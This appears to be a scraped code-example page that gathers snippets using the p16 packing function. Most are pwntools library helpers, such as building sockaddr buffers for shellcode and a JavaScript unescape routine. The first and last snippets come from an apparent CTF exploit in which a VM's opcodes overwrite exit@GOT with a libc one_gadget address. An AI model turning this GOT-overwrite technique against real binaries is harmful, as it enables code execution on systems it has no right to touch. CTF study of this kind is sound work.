示例#1
0
def vm3_asm(ins, operand_info, *args):
    result = ''
    result += p16(ins | operand_info)
    if len(args):
        for arg in args:
            result += arg
    # print result.encode('hex')
    return result
示例#2
0
文件: net.py 项目: McLutzifer/Python 
def sockaddr(host, port, network='ipv4'):
    """sockaddr(host, port, network = 'ipv4') -> (data, length, family)

    Creates a sockaddr_in or sockaddr_in6 memory buffer for use in shellcode.

    Arguments:
      host (str): Either an IP address or a hostname to be looked up.
      port (int): TCP/UDP port.
      network (str): Either 'ipv4' or 'ipv6'.

    Returns:
      A tuple containing the sockaddr buffer, length, and the address family.
    """
    address_family = {'ipv4': socket.AF_INET, 'ipv6': socket.AF_INET6}[network]

    for family, _, _, _, ip in socket.getaddrinfo(host, None, address_family):
        ip = ip[0]
        if family == address_family:
            break
    else:
        log.error("Could not find %s address for %r" % (network, host))

    info = socket.getaddrinfo(host, None, address_family)
    host = socket.inet_pton(address_family, ip)
    sockaddr = p16(address_family)
    sockaddr += pack(
        port, word_size=16,
        endianness='big')  #Port should be big endian = network byte order
    length = 0

    if network == 'ipv4':
        sockaddr += host
        length = 16  # Save ten bytes by skipping two 'push 0'
    else:
        sockaddr += p32(0xffffffff)  # Save three bytes 'push -1' vs 'push 0'
        sockaddr += host
        length = len(sockaddr) + 4  # Save five bytes 'push 0'
    return (sockaddr, length, getattr(address_family, "name", address_family))
示例#3
0
 def p16(self, *a, **kw):
     return self.send(packing.p16(*a, **kw))
示例#4
0
def js_unescape(s, **kwargs):
    r"""js_unescape(s, endian = None, **kwargs) -> bytes

    Unpack an escaped Unicode string from JavaScript's `escape()` function

    Arguments:
        s (str): Escaped string to unpack
        endian (str): Endianness with which to unpack the string ("little"/"big")

    Returns:
        A bytes representation of the unpacked data

    >>> js_unescape('%uadde%uefbe')
    b'\xde\xad\xbe\xef'

    >>> js_unescape('%udead%ubeef', endian='big')
    b'\xde\xad\xbe\xef'

    >>> js_unescape('abc%u4141123')
    b'a\x00b\x00c\x00AA1\x002\x003\x00'

    >>> data = b'abcdABCD1234!@#$\x00\x01\x02\x03\x80\x81\x82\x83'
    >>> js_unescape(js_escape(data)) == data
    True

    >>> js_unescape('%u4141%u42')
    Traceback (most recent call last):
    ValueError: Incomplete Unicode token: %u42

    >>> js_unescape('%u4141%uwoot%4141')
    Traceback (most recent call last):
    ValueError: Failed to decode token: %uwoot

    >>> js_unescape('%u4141%E4%F6%FC%u4141')
    Traceback (most recent call last):
    NotImplementedError: Non-Unicode % tokens are not supported: %E4

    >>> js_unescape('%u4141%zz%u4141')
    Traceback (most recent call last):
    ValueError: Bad % token: %zz
    """
    s = packing._decode(s)
    res = []
    p = 0
    while p < len(s):
        if s[p] == '%':
            if s[p + 1] == "u":
                # Decode Unicode token e.g. %u4142
                n = s[p + 2:p + 6]
                if len(n) < 4:
                    raise ValueError('Incomplete Unicode token: %s' % s[p:])
                try:
                    n = int(n, 16)
                except ValueError:
                    raise ValueError('Failed to decode token: %s' % s[p:p + 6])
                res.append(packing.p16(n))
                p += 6
            elif s[p + 1] in string.hexdigits and s[p + 2] in string.hexdigits:
                # Decode Non-Unicode token e.g. %E4
                raise NotImplementedError(
                    'Non-Unicode %% tokens are not supported: %s' % s[p:p + 3])
            else:
                raise ValueError('Bad %% token: %s' % s[p:p + 3])
        else:
            res.append(packing.p16(ord(s[p])))
            p += 1

    return b''.join(res)
示例#5
0
 def p16(self,  address, data, *a, **kw):    return self.write(address, packing.p16(data, *a, **kw))
 def p8(self,   address, data, *a, **kw):    return self.write(address, packing.p8(data, *a, **kw))
示例#6
0
文件: elf.py 项目: tavakyan/pwntools 
 def p16(self,  address, data, *a, **kw):
     """Writes a 16-bit integer ``data`` to the specified ``address``"""
     return self.write(address, packing.p16(data, *a, **kw))
示例#7
0
def arg_mem(num):
    return '\x22' + p16(num)
示例#8
0
def arg_imm(value):
    return '\x21' + p16(value)
示例#9
0
def arg_reg(num):
    return chr(32) + p16(num)
示例#10
0
''' % (required, prev_)))


# one_gadget
write_value = libc_base + 0x4526a

prev = 0

for i in xrange(8):
    cur = rand_solver(prev + i, write_value & 0xff)
    write_value >>= 8

    code3 = ''
    code3 += vm3_asm(VM3_OPCODE_MOV,
                     VM3_OP1_REG | VM3_OP1_WORD | VM3_OP2_IMM | VM3_OP2_WORD,
                     p16(VM3_REG_DI), p16(0))
    code3 += vm3_asm(VM3_OPCODE_RDRAND, 0) * (cur - prev)

    code3 += vm3_asm(VM3_OPCODE_MOV,
                     VM3_OP1_REG | VM3_OP1_WORD | VM3_OP2_IMM | VM3_OP2_WORD,
                     p16(VM3_REG_DS), p16(0))
    # exit@got
    code3 += vm3_asm(VM3_OPCODE_MOV,
                     VM3_OP1_REG | VM3_OP1_WORD | VM3_OP2_IMM | VM3_OP2_WORD,
                     p16(VM3_REG_DI), p16(-(0x2050C0 - 0x205078 - i) & 0xffff))
    code3 += vm3_asm(VM3_OPCODE_RDRAND, 0)
    code3 += vm3_asm(VM3_OPCODE_HLT, 0)
    execute_vm3(code3)

    prev = cur + 1